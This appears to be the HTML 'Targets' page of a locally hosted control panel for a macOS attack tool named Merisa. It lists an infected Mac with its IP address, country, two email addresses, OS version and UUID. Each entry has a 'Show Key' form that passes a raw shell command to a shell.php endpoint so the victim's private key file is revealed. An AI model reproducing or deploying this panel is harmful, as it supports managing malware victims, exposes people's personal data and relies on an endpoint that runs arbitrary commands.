
<html>
<link rel="icon" href="favicon.ico" />
<head>

<title>Merisa</title>

<ul>
  <li><a style="font-family:Courier;color:gray;" href="http://127.0.0.1:8000">Home</a></li>
  <li><a style="font-family:Courier;color:gray;" href="http://127.0.0.1:8000/add.html">Add</a></li>
  <li><a style="font-family:Courier;color:gray;" href="http://127.0.0.1:8000/targets.html">Targets</a></li>
  <li><a style="font-family:Courier;color:gray;" href="https://github.com/Shellbear">Github</a></li>
</ul>


<style>
.img-circle {
    border-radius: 50%;
}
body {
        background-size: cover;
        background-repeat:no-repeat;
} 

input[type=text] {
	margin-top: 1em;
    padding: 10px 20px;
	width: 12%;
	background: transparent;
	color: #FFFFFF;
}

ul {
    list-style-type: none;
    margin: 0;
    padding: 0;
    overflow: hidden;
    background-color: #333;
}

li {
    float: left;
}

li a {
    display: block;
    color: white;
    text-align: center;
    padding: 14px 16px;
    text-decoration: none;
}

/* Change the link color to #111 (black) on hover */
li a:hover {
    background-color: #111;
}

input[type=submit] {
	background-color: #555555; /* Green */
    border: none;
    color: white;
    padding: 10px 20px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
}

 
</style>

</head>

<body style="background-color:#202020;">

<br></br>
<br></br>


<center><img class="img-circle" src="https://avatars3.githubusercontent.com/u/20194995?v=3&s=460" alt="Profile Picture" style="width:150px;height:150px;"></center>

<center><h1 style="font-family:Courier;color:#FFFFFF">Merisa by Shellbear</h1></center>

<br>

<center><h1 style="font-family:Courier;color:#FFFFFF">Targets</h1></center>

<center><p style="font-family:Courier;color:gray;font-size:17px">Here the list of targets</p></center>

<br>
<br>
<center><p style="font-family:Courier;color:#DCDCDC;font-size:17px"> Macbook Pro de ShellBear</a></b>
<br>
<center><img class="" src="http://img10.deviantart.net/292b/i/2011/357/b/f/apple_macbook_pro_svg_by_averywebdesign-d4jz8qq.png" alt="Profile Picture" style="width:200px"></center>
<center><p style="font-family:Courier;color:gray;font-size:17px">Session Name:  shellbear</p>
<p style="font-family:Courier;color:gray;font-size:17px">IP:  92.148.13.6</p>
<p style="font-family:Courier;color:gray;font-size:17px">Country:  FR</p>
<p style="font-family:Courier;color:gray;font-size:17px">iCloud Mail:  antoine.ordonez@gmail.com yasmina.znt@icloud.com</p>
<p style="font-family:Courier;color:gray;font-size:17px">MacOS Version:  10.12.4</p>
<p style="font-family:Courier;color:gray;font-size:17px">UUID:  D964B6BE-3787-5E4B-8436-C9C6ECBE4DFA</p>
<form action="http://127.0.0.1:8000/shell.php?">
<center>
<input type="submit" value="Show Key">
<input type="hidden" name="command" value="open -R /Users/shellbear/desktop/merisa/Builds/05-21@18h59_06/Private-key-client.pem"/> 
<br>
<br>
</center>
</form>
</div>
<br>
<br>
<br>
<center><p style="font-family:Courier;color:#DCDCDC;font-size:17px"> Macbook Pro de ShellBear</a></b>
<br>
<center><img class="" src="http://img10.deviantart.net/292b/i/2011/357/b/f/apple_macbook_pro_svg_by_averywebdesign-d4jz8qq.png" alt="Profile Picture" style="width:200px"></center>
<center><p style="font-family:Courier;color:gray;font-size:17px">Session Name:  shellbear</p>
<p style="font-family:Courier;color:gray;font-size:17px">IP:  92.148.13.6</p>
<p style="font-family:Courier;color:gray;font-size:17px">Country:  FR</p>
<p style="font-family:Courier;color:gray;font-size:17px">iCloud Mail:  antoine.ordonez@gmail.com yasmina.znt@icloud.com</p>
<p style="font-family:Courier;color:gray;font-size:17px">MacOS Version:  10.12.4</p>
<p style="font-family:Courier;color:gray;font-size:17px">UUID:  D964B6BE-3787-5E4B-8436-C9C6ECBE4DFA</p>
<form action="http://127.0.0.1:8000/shell.php?">
<center>
<input type="submit" value="Show Key">
<input type="hidden" name="command" value="open -R /Users/shellbear/desktop/merisa/Builds/05-21@18h59_06/Private-key-client.pem"/> 
<br>
<br>
</center>
</form>
</div>
<br>
<br>
<br>
